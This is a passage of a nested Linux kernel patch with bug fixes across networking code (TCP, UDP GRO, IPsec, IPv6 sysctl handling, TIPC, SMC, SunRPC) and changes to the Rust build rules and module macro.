+ 		 * TCP_CLOSE_WAIT -> TCP_LAST_ACK
+ 		 *
+ 		 * are legal only when FIN has been sent (i.e. in window),
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 34460c9b37ae2..4c9da94553365 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -6597,6 +6597,8 @@ int tcp_rcv_state_process(struct sock *sk, struct sk_buff *skb)
+ 
+ 		tcp_initialize_rcv_mss(sk);
+ 		tcp_fast_path_on(tp);
++		if (sk->sk_shutdown & SEND_SHUTDOWN)
++			tcp_shutdown(sk, SEND_SHUTDOWN);
+ 		break;
+ 
+ 	case TCP_FIN_WAIT1: {
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index be2c807eed15d..5dcb969cb5e9c 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -153,6 +153,12 @@ int tcp_twsk_unique(struct sock *sk, struct sock *sktw, void *twp)
+ 	if (tcptw->tw_ts_recent_stamp &&
+ 	    (!twp || (reuse && time_after32(ktime_get_seconds(),
+ 					    tcptw->tw_ts_recent_stamp)))) {
++		/* inet_twsk_hashdance() sets sk_refcnt after putting twsk
++		 * and releasing the bucket lock.
++		 */
++		if (unlikely(!refcount_inc_not_zero(&sktw->sk_refcnt)))
++			return 0;
++
+ 		/* In case of repair and re-using TIME-WAIT sockets we still
+ 		 * want to be sure that it is safe as above but honor the
+ 		 * sequence numbers and time stamps set as part of the repair
+@@ -173,7 +179,7 @@ int tcp_twsk_unique(struct sock *sk, struct sock *sktw, void *twp)
+ 			tp->rx_opt.ts_recent	   = tcptw->tw_ts_recent;
+ 			tp->rx_opt.ts_recent_stamp = tcptw->tw_ts_recent_stamp;
+ 		}
+-		sock_hold(sktw);
++
+ 		return 1;
+ 	}
+ 
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index 67087da45a1f7..15f814c1e1693 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -3480,7 +3480,9 @@ void tcp_send_fin(struct sock *sk)
+ 			return;
+ 		}
+ 	} else {
+-		skb = alloc_skb_fclone(MAX_TCP_HEADER, sk->sk_allocation);
++		skb = alloc_skb_fclone(MAX_TCP_HEADER,
++				       sk_gfp_mask(sk, GFP_ATOMIC |
++						       __GFP_NOWARN));
+ 		if (unlikely(!skb))
+ 			return;
+ 
+diff --git a/net/ipv4/udp_offload.c b/net/ipv4/udp_offload.c
+index 84b7d6089f76c..794ea24292f62 100644
+--- a/net/ipv4/udp_offload.c
++++ b/net/ipv4/udp_offload.c
+@@ -463,6 +463,7 @@ static struct sk_buff *udp_gro_receive_segment(struct list_head *head,
+ 	struct sk_buff *p;
+ 	unsigned int ulen;
+ 	int ret = 0;
++	int flush;
+ 
+ 	/* requires non zero csum, for symmetry with GSO */
+ 	if (!uh->check) {
+@@ -496,13 +497,22 @@ static struct sk_buff *udp_gro_receive_segment(struct list_head *head,
+ 			return p;
+ 		}
+ 
++		flush = NAPI_GRO_CB(p)->flush;
++
++		if (NAPI_GRO_CB(p)->flush_id != 1 ||
++		    NAPI_GRO_CB(p)->count != 1 ||
++		    !NAPI_GRO_CB(p)->is_atomic)
++			flush |= NAPI_GRO_CB(p)->flush_id;
++		else
++			NAPI_GRO_CB(p)->is_atomic = false;
++
+ 		/* Terminate the flow on len mismatch or if it grow "too much".
+ 		 * Under small packet flood GRO count could elsewhere grow a lot
+ 		 * leading to excessive truesize values.
+ 		 * On len mismatch merge the first packet shorter than gso_size,
+ 		 * otherwise complete the GRO packet.
+ 		 */
+-		if (ulen > ntohs(uh2->len)) {
++		if (ulen > ntohs(uh2->len) || flush) {
+ 			pp = p;
+ 		} else {
+ 			if (NAPI_GRO_CB(skb)->is_flist) {
+diff --git a/net/ipv4/xfrm4_input.c b/net/ipv4/xfrm4_input.c
+index 183f6dc372429..f6e90ba50b639 100644
+--- a/net/ipv4/xfrm4_input.c
++++ b/net/ipv4/xfrm4_input.c
+@@ -61,7 +61,11 @@ int xfrm4_transport_finish(struct sk_buff *skb, int async)
+ 	ip_send_check(iph);
+ 
+ 	if (xo && (xo->flags & XFRM_GRO)) {
+-		skb_mac_header_rebuild(skb);
++		/* The full l2 header needs to be preserved so that re-injecting the packet at l2
++		 * works correctly in the presence of vlan tags.
++		 */
++		skb_mac_header_rebuild_full(skb, xo->orig_mac_len);
++		skb_reset_network_header(skb);
+ 		skb_reset_transport_header(skb);
+ 		return 0;
+ 	}
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index 3866deaadbb66..22e246ff910ee 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -4133,7 +4133,7 @@ static void addrconf_dad_work(struct work_struct *w)
+ 			if (!ipv6_generate_eui64(addr.s6_addr + 8, idev->dev) &&
+ 			    ipv6_addr_equal(&ifp->addr, &addr)) {
+ 				/* DAD failed for link-local based on MAC */
+-				idev->cnf.disable_ipv6 = 1;
++				WRITE_ONCE(idev->cnf.disable_ipv6, 1);
+ 
+ 				pr_info("%s: IPv6 being disabled!\n",
+ 					ifp->idev->dev->name);
+@@ -5979,7 +5979,7 @@ static int inet6_fill_ifinfo(struct sk_buff *skb, struct inet6_dev *idev,
+ 	    (dev->ifindex != dev_get_iflink(dev) &&
+ 	     nla_put_u32(skb, IFLA_LINK, dev_get_iflink(dev))) ||
+ 	    nla_put_u8(skb, IFLA_OPERSTATE,
+-		       netif_running(dev) ? dev->operstate : IF_OPER_DOWN))
++		       netif_running(dev) ? READ_ONCE(dev->operstate) : IF_OPER_DOWN))
+ 		goto nla_put_failure;
+ 	protoinfo = nla_nest_start_noflag(skb, IFLA_PROTINFO);
+ 	if (!protoinfo)
+@@ -6289,7 +6289,8 @@ static void addrconf_disable_change(struct net *net, __s32 newf)
+ 		idev = __in6_dev_get(dev);
+ 		if (idev) {
+ 			int changed = (!idev->cnf.disable_ipv6) ^ (!newf);
+-			idev->cnf.disable_ipv6 = newf;
++
++			WRITE_ONCE(idev->cnf.disable_ipv6, newf);
+ 			if (changed)
+ 				dev_disable_change(idev);
+ 		}
+@@ -6306,7 +6307,7 @@ static int addrconf_disable_ipv6(struct ctl_table *table, int *p, int newf)
+ 
+ 	net = (struct net *)table->extra2;
+ 	old = *p;
+-	*p = newf;
++	WRITE_ONCE(*p, newf);
+ 
+ 	if (p == &net->ipv6.devconf_dflt->disable_ipv6) {
+ 		rtnl_unlock();
+@@ -6314,7 +6315,7 @@ static int addrconf_disable_ipv6(struct ctl_table *table, int *p, int newf)
+ 	}
+ 
+ 	if (p == &net->ipv6.devconf_all->disable_ipv6) {
+-		net->ipv6.devconf_dflt->disable_ipv6 = newf;
++		WRITE_ONCE(net->ipv6.devconf_dflt->disable_ipv6, newf);
+ 		addrconf_disable_change(net, newf);
+ 	} else if ((!newf) ^ (!old))
+ 		dev_disable_change((struct inet6_dev *)table->extra1);
+diff --git a/net/ipv6/fib6_rules.c b/net/ipv6/fib6_rules.c
+index be52b18e08a6b..6eeab21512ba9 100644
+--- a/net/ipv6/fib6_rules.c
++++ b/net/ipv6/fib6_rules.c
+@@ -233,8 +233,12 @@ static int __fib6_rule_action(struct fib_rule *rule, struct flowi *flp,
+ 	rt = pol_lookup_func(lookup,
+ 			     net, table, flp6, arg->lookup_data, flags);
+ 	if (rt != net->ipv6.ip6_null_entry) {
++		struct inet6_dev *idev = ip6_dst_idev(&rt->dst);
++
++		if (!idev)
++			goto again;
+ 		err = fib6_rule_saddr(net, rule, flags, flp6,
+-				      ip6_dst_idev(&rt->dst)->dev);
++				      idev->dev);
+ 
+ 		if (err == -EAGAIN)
+ 			goto again;
+diff --git a/net/ipv6/ip6_input.c b/net/ipv6/ip6_input.c
+index b8378814532ce..1ba97933c74fb 100644
+--- a/net/ipv6/ip6_input.c
++++ b/net/ipv6/ip6_input.c
+@@ -168,9 +168,9 @@ static struct sk_buff *ip6_rcv_core(struct sk_buff *skb, struct net_device *dev,
+ 
+ 	SKB_DR_SET(reason, NOT_SPECIFIED);
+ 	if ((skb = skb_share_check(skb, GFP_ATOMIC)) == NULL ||
+-	    !idev || unlikely(idev->cnf.disable_ipv6)) {
++	    !idev || unlikely(READ_ONCE(idev->cnf.disable_ipv6))) {
+ 		__IP6_INC_STATS(net, idev, IPSTATS_MIB_INDISCARDS);
+-		if (idev && unlikely(idev->cnf.disable_ipv6))
++		if (idev && unlikely(READ_ONCE(idev->cnf.disable_ipv6)))
+ 			SKB_DR_SET(reason, IPV6DISABLED);
+ 		goto drop;
+ 	}
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index e9ae084d038d1..fb26401950e7e 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -224,7 +224,7 @@ int ip6_output(struct net *net, struct sock *sk, struct sk_buff *skb)
+ 	skb->protocol = htons(ETH_P_IPV6);
+ 	skb->dev = dev;
+ 
+-	if (unlikely(idev->cnf.disable_ipv6)) {
++	if (unlikely(!idev || READ_ONCE(idev->cnf.disable_ipv6))) {
+ 		IP6_INC_STATS(net, idev, IPSTATS_MIB_OUTDISCARDS);
+ 		kfree_skb_reason(skb, SKB_DROP_REASON_IPV6DISABLED);
+ 		return 0;
+diff --git a/net/ipv6/xfrm6_input.c b/net/ipv6/xfrm6_input.c
+index 4156387248e40..8432b50d9ce4c 100644
+--- a/net/ipv6/xfrm6_input.c
++++ b/net/ipv6/xfrm6_input.c
+@@ -56,7 +56,11 @@ int xfrm6_transport_finish(struct sk_buff *skb, int async)
+ 	skb_postpush_rcsum(skb, skb_network_header(skb), nhlen);
+ 
+ 	if (xo && (xo->flags & XFRM_GRO)) {
+-		skb_mac_header_rebuild(skb);
++		/* The full l2 header needs to be preserved so that re-injecting the packet at l2
++		 * works correctly in the presence of vlan tags.
++		 */
++		skb_mac_header_rebuild_full(skb, xo->orig_mac_len);
++		skb_reset_network_header(skb);
+ 		skb_reset_transport_header(skb);
+ 		return 0;
+ 	}
+diff --git a/net/l2tp/l2tp_eth.c b/net/l2tp/l2tp_eth.c
+index f2ae03c404736..1f41d2f3b8c4e 100644
+--- a/net/l2tp/l2tp_eth.c
++++ b/net/l2tp/l2tp_eth.c
+@@ -136,6 +136,9 @@ static void l2tp_eth_dev_recv(struct l2tp_session *session, struct sk_buff *skb,
+ 	/* checksums verified by L2TP */
+ 	skb->ip_summed = CHECKSUM_NONE;
+ 
++	/* drop outer flow-hash */
++	skb_clear_hash(skb);
++
+ 	skb_dst_drop(skb);
+ 	nf_reset_ct(skb);
+ 
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index d5dd2d9e89b48..3e14d5c9aa1b4 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -120,7 +120,7 @@ struct ieee80211_bss {
+ };
+ 
+ /**
+- * enum ieee80211_corrupt_data_flags - BSS data corruption flags
++ * enum ieee80211_bss_corrupt_data_flags - BSS data corruption flags
+  * @IEEE80211_BSS_CORRUPT_BEACON: last beacon frame received was corrupted
+  * @IEEE80211_BSS_CORRUPT_PROBE_RESP: last probe response received was corrupted
+  *
+@@ -133,7 +133,7 @@ enum ieee80211_bss_corrupt_data_flags {
+ };
+ 
+ /**
+- * enum ieee80211_valid_data_flags - BSS valid data flags
++ * enum ieee80211_bss_valid_data_flags - BSS valid data flags
+  * @IEEE80211_BSS_VALID_WMM: WMM/UAPSD data was gathered from non-corrupt IE
+  * @IEEE80211_BSS_VALID_RATES: Supported rates were gathered from non-corrupt IE
+  * @IEEE80211_BSS_VALID_ERP: ERP flag was gathered from non-corrupt IE
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index c652c8ca765c2..b6815610a6fa1 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -3754,6 +3754,9 @@ static int mptcp_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+ 		MPTCP_INC_STATS(sock_net(ssock->sk), MPTCP_MIB_TOKENFALLBACKINIT);
+ 		mptcp_subflow_early_fallback(msk, subflow);
+ 	}
++
++	WRITE_ONCE(msk->write_seq, subflow->idsn);
++	WRITE_ONCE(msk->snd_nxt, subflow->idsn);
+ 	if (likely(!__mptcp_check_fallback(msk)))
+ 		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_MPCAPABLEACTIVE);
+ 
+diff --git a/net/nsh/nsh.c b/net/nsh/nsh.c
+index 0f23e5e8e03eb..3e0fc71d95a14 100644
+--- a/net/nsh/nsh.c
++++ b/net/nsh/nsh.c
+@@ -76,13 +76,15 @@ EXPORT_SYMBOL_GPL(nsh_pop);
+ static struct sk_buff *nsh_gso_segment(struct sk_buff *skb,
+ 				       netdev_features_t features)
+ {
++	unsigned int outer_hlen, mac_len, nsh_len;
+ 	struct sk_buff *segs = ERR_PTR(-EINVAL);
+ 	u16 mac_offset = skb->mac_header;
+-	unsigned int nsh_len, mac_len;
+-	__be16 proto;
++	__be16 outer_proto, proto;
+ 
+ 	skb_reset_network_header(skb);
+ 
++	outer_proto = skb->protocol;
++	outer_hlen = skb_mac_header_len(skb);
+ 	mac_len = skb->mac_len;
+ 
+ 	if (unlikely(!pskb_may_pull(skb, NSH_BASE_HDR_LEN)))
+@@ -112,10 +114,10 @@ static struct sk_buff *nsh_gso_segment(struct sk_buff *skb,
+ 	}
+ 
+ 	for (skb = segs; skb; skb = skb->next) {
+-		skb->protocol = htons(ETH_P_NSH);
+-		__skb_push(skb, nsh_len);
+-		skb->mac_header = mac_offset;
+-		skb->network_header = skb->mac_header + mac_len;
++		skb->protocol = outer_proto;
++		__skb_push(skb, nsh_len + outer_hlen);
++		skb_reset_mac_header(skb);
++		skb_set_network_header(skb, outer_hlen);
+ 		skb->mac_len = mac_len;
+ 	}
+ 
+diff --git a/net/phonet/pn_netlink.c b/net/phonet/pn_netlink.c
+index 59aebe2968907..dd4c7e9a634fb 100644
+--- a/net/phonet/pn_netlink.c
++++ b/net/phonet/pn_netlink.c
+@@ -193,7 +193,7 @@ void rtm_phonet_notify(int event, struct net_device *dev, u8 dst)
+ 	struct sk_buff *skb;
+ 	int err = -ENOBUFS;
+ 
+-	skb = nlmsg_new(NLMSG_ALIGN(sizeof(struct ifaddrmsg)) +
++	skb = nlmsg_new(NLMSG_ALIGN(sizeof(struct rtmsg)) +
+ 			nla_total_size(1) + nla_total_size(4), GFP_KERNEL);
+ 	if (skb == NULL)
+ 		goto errout;
+diff --git a/net/smc/smc_ib.c b/net/smc/smc_ib.c
+index ace8611735321..6de53431629ca 100644
+--- a/net/smc/smc_ib.c
++++ b/net/smc/smc_ib.c
+@@ -209,13 +209,18 @@ int smc_ib_find_route(struct net *net, __be32 saddr, __be32 daddr,
+ 	if (IS_ERR(rt))
+ 		goto out;
+ 	if (rt->rt_uses_gateway && rt->rt_gw_family != AF_INET)
+-		goto out;
+-	neigh = rt->dst.ops->neigh_lookup(&rt->dst, NULL, &fl4.daddr);
+-	if (neigh) {
+-		memcpy(nexthop_mac, neigh->ha, ETH_ALEN);
+-		*uses_gateway = rt->rt_uses_gateway;
+-		return 0;
+-	}
++		goto out_rt;
++	neigh = dst_neigh_lookup(&rt->dst, &fl4.daddr);
++	if (!neigh)
++		goto out_rt;
++	memcpy(nexthop_mac, neigh->ha, ETH_ALEN);
++	*uses_gateway = rt->rt_uses_gateway;
++	neigh_release(neigh);
++	ip_rt_put(rt);
++	return 0;
++
++out_rt:
++	ip_rt_put(rt);
+ out:
+ 	return -ENOENT;
+ }
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index 61e5c77462e94..b774028e4aa8f 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -398,7 +398,7 @@ static struct rpc_clnt * rpc_new_client(const struct rpc_create_args *args,
+ 	clnt->cl_maxproc  = version->nrprocs;
+ 	clnt->cl_prog     = args->prognumber ? : program->number;
+ 	clnt->cl_vers     = version->number;
+-	clnt->cl_stats    = program->stats;
++	clnt->cl_stats    = args->stats ? : program->stats;
+ 	clnt->cl_metrics  = rpc_alloc_iostats(clnt);
+ 	rpc_init_pipe_dir_head(&clnt->cl_pipedir_objects);
+ 	err = -ENOMEM;
+@@ -677,6 +677,7 @@ struct rpc_clnt *rpc_clone_client(struct rpc_clnt *clnt)
+ 		.version	= clnt->cl_vers,
+ 		.authflavor	= clnt->cl_auth->au_flavor,
+ 		.cred		= clnt->cl_cred,
++		.stats		= clnt->cl_stats,
+ 	};
+ 	return __rpc_clone_client(&args, clnt);
+ }
+@@ -699,6 +700,7 @@ rpc_clone_client_set_auth(struct rpc_clnt *clnt, rpc_authflavor_t flavor)
+ 		.version	= clnt->cl_vers,
+ 		.authflavor	= flavor,
+ 		.cred		= clnt->cl_cred,
++		.stats		= clnt->cl_stats,
+ 	};
+ 	return __rpc_clone_client(&args, clnt);
+ }
+@@ -1044,6 +1046,7 @@ struct rpc_clnt *rpc_bind_new_program(struct rpc_clnt *old,
+ 		.version	= vers,
+ 		.authflavor	= old->cl_auth->au_flavor,
+ 		.cred		= old->cl_cred,
++		.stats		= old->cl_stats,
+ 	};
+ 	struct rpc_clnt *clnt;
+ 	int err;
+diff --git a/net/sunrpc/xprt.c b/net/sunrpc/xprt.c
+index 656cec2083718..ab453ede54f0c 100644
+--- a/net/sunrpc/xprt.c
++++ b/net/sunrpc/xprt.c
+@@ -1164,7 +1164,7 @@ xprt_request_enqueue_receive(struct rpc_task *task)
+ 	spin_unlock(&xprt->queue_lock);
+ 
+ 	/* Turn off autodisconnect */
+-	del_singleshot_timer_sync(&xprt->timer);
++	del_timer_sync(&xprt->timer);
+ 	return 0;
+ }
+ 
+diff --git a/net/tipc/msg.c b/net/tipc/msg.c
+index 5c9fd4791c4ba..76284fc538ebd 100644
+--- a/net/tipc/msg.c
++++ b/net/tipc/msg.c
+@@ -142,9 +142,9 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
+ 	if (fragid == FIRST_FRAGMENT) {
+ 		if (unlikely(head))
+ 			goto err;
+-		*buf = NULL;
+ 		if (skb_has_frag_list(frag) && __skb_linearize(frag))
+ 			goto err;
++		*buf = NULL;
+ 		frag = skb_unshare(frag, GFP_ATOMIC);
+ 		if (unlikely(!frag))
+ 			goto err;
+@@ -156,6 +156,11 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
+ 	if (!head)
+ 		goto err;
+ 
++	/* Either the input skb ownership is transferred to headskb
++	 * or the input skb is freed, clear the reference to avoid
++	 * bad access on error path.
++	 */
++	*buf = NULL;
+ 	if (skb_try_coalesce(head, frag, &headstolen, &delta)) {
+ 		kfree_skb_partial(frag, headstolen);
+ 	} else {
+@@ -179,7 +184,6 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
+ 		*headbuf = NULL;
+ 		return 1;
+ 	}
+-	*buf = NULL;
+ 	return 0;
+ err:
+ 	kfree_skb(*buf);
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 1a3bd554e2586..a00df7b89ca86 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -13802,6 +13802,8 @@ static int nl80211_set_coalesce(struct sk_buff *skb, struct genl_info *info)
+ error:
+ 	for (i = 0; i < new_coalesce.n_rules; i++) {
+ 		tmp_rule = &new_coalesce.rules[i];
++		if (!tmp_rule)
++			continue;
+ 		for (j = 0; j < tmp_rule->n_patterns; j++)
+ 			kfree(tmp_rule->patterns[j].mask);
+ 		kfree(tmp_rule->patterns);
+diff --git a/net/wireless/trace.h b/net/wireless/trace.h
+index a405c3edbc47e..cb5c3224e038a 100644
+--- a/net/wireless/trace.h
++++ b/net/wireless/trace.h
+@@ -1018,7 +1018,7 @@ TRACE_EVENT(rdev_get_mpp,
+ TRACE_EVENT(rdev_dump_mpp,
+ 	TP_PROTO(struct wiphy *wiphy, struct net_device *netdev, int _idx,
+ 		 u8 *dst, u8 *mpp),
+-	TP_ARGS(wiphy, netdev, _idx, mpp, dst),
++	TP_ARGS(wiphy, netdev, _idx, dst, mpp),
+ 	TP_STRUCT__entry(
+ 		WIPHY_ENTRY
+ 		NETDEV_ENTRY
+diff --git a/net/xfrm/xfrm_input.c b/net/xfrm/xfrm_input.c
+index d0320e35accbf..4bba890ff3bc0 100644
+--- a/net/xfrm/xfrm_input.c
++++ b/net/xfrm/xfrm_input.c
+@@ -388,11 +388,15 @@ static int xfrm_prepare_input(struct xfrm_state *x, struct sk_buff *skb)
+  */
+ static int xfrm4_transport_input(struct xfrm_state *x, struct sk_buff *skb)
+ {
++	struct xfrm_offload *xo = xfrm_offload(skb);
+ 	int ihl = skb->data - skb_transport_header(skb);
+ 
+ 	if (skb->transport_header != skb->network_header) {
+ 		memmove(skb_transport_header(skb),
+ 			skb_network_header(skb), ihl);
++		if (xo)
++			xo->orig_mac_len =
++				skb_mac_header_was_set(skb) ? skb_mac_header_len(skb) : 0;
+ 		skb->network_header = skb->transport_header;
+ 	}
+ 	ip_hdr(skb)->tot_len = htons(skb->len + ihl);
+@@ -403,11 +407,15 @@ static int xfrm4_transport_input(struct xfrm_state *x, struct sk_buff *skb)
+ static int xfrm6_transport_input(struct xfrm_state *x, struct sk_buff *skb)
+ {
+ #if IS_ENABLED(CONFIG_IPV6)
++	struct xfrm_offload *xo = xfrm_offload(skb);
+ 	int ihl = skb->data - skb_transport_header(skb);
+ 
+ 	if (skb->transport_header != skb->network_header) {
+ 		memmove(skb_transport_header(skb),
+ 			skb_network_header(skb), ihl);
++		if (xo)
++			xo->orig_mac_len =
++				skb_mac_header_was_set(skb) ? skb_mac_header_len(skb) : 0;
+ 		skb->network_header = skb->transport_header;
+ 	}
+ 	ipv6_hdr(skb)->payload_len = htons(skb->len + ihl -
+diff --git a/rust/Makefile b/rust/Makefile
+index 7700d3853404e..6d0c0e9757f21 100644
+--- a/rust/Makefile
++++ b/rust/Makefile
+@@ -322,10 +322,9 @@ $(obj)/exports_kernel_generated.h: $(obj)/kernel.o FORCE
+ quiet_cmd_rustc_procmacro = $(RUSTC_OR_CLIPPY_QUIET) P $@
+       cmd_rustc_procmacro = \
+ 	$(RUSTC_OR_CLIPPY) $(rust_common_flags) \
+-		--emit=dep-info,link --extern proc_macro \
+-		--crate-type proc-macro --out-dir $(objtree)/$(obj) \
++		--emit=dep-info=$(depfile) --emit=link=$@ --extern proc_macro \
++		--crate-type proc-macro \
+ 		--crate-name $(patsubst lib%.so,%,$(notdir $@)) $<; \
+-	mv $(objtree)/$(obj)/$(patsubst lib%.so,%,$(notdir $@)).d $(depfile); \
+ 	sed -i '/^\#/d' $(depfile)
+ 
+ # Procedural macros can only be used with the `rustc` that compiled it.
+@@ -339,10 +338,10 @@ quiet_cmd_rustc_library = $(if $(skip_clippy),RUSTC,$(RUSTC_OR_CLIPPY_QUIET)) L
+ 	OBJTREE=$(abspath $(objtree)) \
+ 	$(if $(skip_clippy),$(RUSTC),$(RUSTC_OR_CLIPPY)) \
+ 		$(filter-out $(skip_flags),$(rust_flags) $(rustc_target_flags)) \
+-		--emit=dep-info,obj,metadata --crate-type rlib \
+-		--out-dir $(objtree)/$(obj) -L$(objtree)/$(obj) \
++		--emit=dep-info=$(depfile) --emit=obj=$@ \
++		--emit=metadata=$(dir $@)$(patsubst %.o,lib%.rmeta,$(notdir $@)) \
++		--crate-type rlib -L$(objtree)/$(obj) \
+ 		--crate-name $(patsubst %.o,%,$(notdir $@)) $<; \
+-	mv $(objtree)/$(obj)/$(patsubst %.o,%,$(notdir $@)).d $(depfile); \
+ 	sed -i '/^\#/d' $(depfile) \
+ 	$(if $(rustc_objcopy),;$(OBJCOPY) $(rustc_objcopy) $@)
+ 
+diff --git a/rust/kernel/error.rs b/rust/kernel/error.rs
+index 466b2a8fe569b..4a3a6306cfe19 100644
+--- a/rust/kernel/error.rs
++++ b/rust/kernel/error.rs
+@@ -25,7 +25,7 @@ pub mod code {
+ 
+ impl Error {
+     /// Returns the kernel error code.
+-    pub fn to_kernel_errno(self) -> core::ffi::c_int {
++    pub fn to_errno(self) -> core::ffi::c_int {
+         self.0
+     }
+ }
+diff --git a/rust/kernel/lib.rs b/rust/kernel/lib.rs
+index abd46261d3855..43cf5f6bde9c2 100644
+--- a/rust/kernel/lib.rs
++++ b/rust/kernel/lib.rs
+@@ -37,7 +37,7 @@
+ /// The top level entrypoint to implementing a kernel module.
+ ///
+ /// For any teardown or cleanup operations, your type may implement [`Drop`].
+-pub trait Module: Sized + Sync {
++pub trait Module: Sized + Sync + Send {
+     /// Called at module initialization time.
+     ///
+     /// Use this method to perform whatever setup or registration your module
+diff --git a/rust/macros/module.rs b/rust/macros/module.rs
+index 186a5b8be23cd..031028b3dc41b 100644
+--- a/rust/macros/module.rs
++++ b/rust/macros/module.rs
+@@ -179,17 +179,6 @@ pub(crate) fn module(ts: TokenStream) -> TokenStream {
+             /// Used by the printing macros, e.g. [`info!`].
+             const __LOG_PREFIX: &[u8] = b\"{name}\\0\";
+ 
+-            /// The \"Rust loadable module\" mark, for `scripts/is_rust_module.sh`.
+-            //
+-            // This may be best done another way later on, e.g. as a new modinfo
+-            // key or a new section. For the moment, keep it simple.
+-            #[cfg(MODULE)]
+-            #[doc(hidden)]
+-            #[used]
+-            static __IS_RUST_MODULE: () = ();
+-
+-            static mut __MOD: Option<{type_}> = None;
+-
+             // SAFETY: `__this_module` is constructed by the kernel at load time and will not be
+             // freed until the module is unloaded.
+             #[cfg(MODULE)]
+@@ -201,76 +190,132 @@ pub(crate) fn module(ts: TokenStream) -> TokenStream {
+                 kernel::ThisModule::from_ptr(core::ptr::null_mut())
+             }};
+ 
+-            // Loadable modules need to export the `{{init,cleanup}}_module` identifiers.
+-            #[cfg(MODULE)]
+-            #[doc(hidden)]
+-            #[no_mangle]
+-            pub extern \"C\" fn init_module() -> core::ffi::c_int {{
+-                __init()
+-            }}
+-
+-            #[cfg(MODULE)]
+-            #[doc(hidden)]
+-            #[no_mangle]
+-            pub extern \"C\" fn cleanup_module() {{
+-                __exit()
+-            }}
++            // Double nested modules, since then nobody can access the public items inside.
++            mod __module_init {{
++                mod __module_init {{
++                    use super::super::{type_};
++
++                    /// The \"Rust loadable module\" mark.
++                    //
++                    // This may be best done another way later on, e.g. as a new modinfo
++                    // key or a new section. For the moment, keep it simple.
++                    #[cfg(MODULE)]
++                    #[doc(hidden)]
++                    #[used]
++                    static __IS_RUST_MODULE: () = ();
++
++                    static mut __MOD: Option<{type_}> = None;
++
++                    // Loadable modules need to export the `{{init,cleanup}}_module` identifiers.
++                    /// # Safety
++                    ///
++                    /// This function must not be called after module initialization, because it may be
++                    /// freed after that completes.
++                    #[cfg(MODULE)]
++                    #[doc(hidden)]
++                    #[no_mangle]
++                    #[link_section = \".init.text\"]
++                    pub unsafe extern \"C\" fn init_module() -> core::ffi::c_int {{
++                        // SAFETY: This function is inaccessible to the outside due to the double
++                        // module wrapping it. It is called exactly once by the C side via its
++                        // unique name.
++                        unsafe {{ __init() }}
++                    }}
+ 
+-            // Built-in modules are initialized through an initcall pointer
+-            // and the identifiers need to be unique.
+-            #[cfg(not(MODULE))]
+-            #[cfg(not(CONFIG_HAVE_ARCH_PREL32_RELOCATIONS))]
+-            #[doc(hidden)]
+-            #[link_section = \"{initcall_section}\"]
+-            #[used]
+-            pub static __{name}_initcall: extern \"C\" fn() -> core::ffi::c_int = __{name}_init;
++                    #[cfg(MODULE)]
++                    #[doc(hidden)]
++                    #[no_mangle]
++                    pub extern \"C\" fn cleanup_module() {{
++                        // SAFETY:
++                        // - This function is inaccessible to the outside due to the double
++                        //   module wrapping it. It is called exactly once by the C side via its
++                        //   unique name,
++                        // - furthermore it is only called after `init_module` has returned `0`
++                        //   (which delegates to `__init`).
++                        unsafe {{ __exit() }}
++                    }}
+ 
+-            #[cfg(not(MODULE))]
+-            #[cfg(CONFIG_HAVE_ARCH_PREL32_RELOCATIONS)]
+-            core::arch::global_asm!(
+-                r#\".section \"{initcall_section}\", \"a\"
+-                __{name}_initcall:
+-                    .long   __{name}_init - .
+-                    .previous
+-                \"#
+-            );
++                    // Built-in modules are initialized through an initcall pointer
++                    // and the identifiers need to be unique.
++                    #[cfg(not(MODULE))]
++                    #[cfg(not(CONFIG_HAVE_ARCH_PREL32_RELOCATIONS))]
++                    #[doc(hidden)]
++                    #[link_section = \"{initcall_section}\"]
++                    #[used]
++                    pub static __{name}_initcall: extern \"C\" fn() -> core::ffi::c_int = __{name}_init;
++
++                    #[cfg(not(MODULE))]
++                    #[cfg(CONFIG_HAVE_ARCH_PREL32_RELOCATIONS)]
++                    core::arch::global_asm!(
++                        r#\".section \"{initcall_section}\", \"a\"
++                        __{name}_initcall:
++                            .long   __{name}_init - .
++                            .previous
++                        \"#
++                    );
++
++                    #[cfg(not(MODULE))]
++                    #[doc(hidden)]
++                    #[no_mangle]
++                    pub extern \"C\" fn __{name}_init() -> core::ffi::c_int {{
++                        // SAFETY: This function is inaccessible to the outside due to the double
++                        // module wrapping it. It is called exactly once by the C side via its
++                        // placement above in the initcall section.
++                        unsafe {{ __init() }}
++                    }}
+ 
+-            #[cfg(not(MODULE))]
+-            #[doc(hidden)]
+-            #[no_mangle]
+-            pub extern \"C\" fn __{name}_init() -> core::ffi::c_int {{
+-                __init()
+-            }}
++                    #[cfg(not(MODULE))]
++                    #[doc(hidden)]
++                    #[no_mangle]
++                    pub extern \"C\" fn __{name}_exit() {{
++                        // SAFETY:
++                        // - This function is inaccessible to the outside due to the double
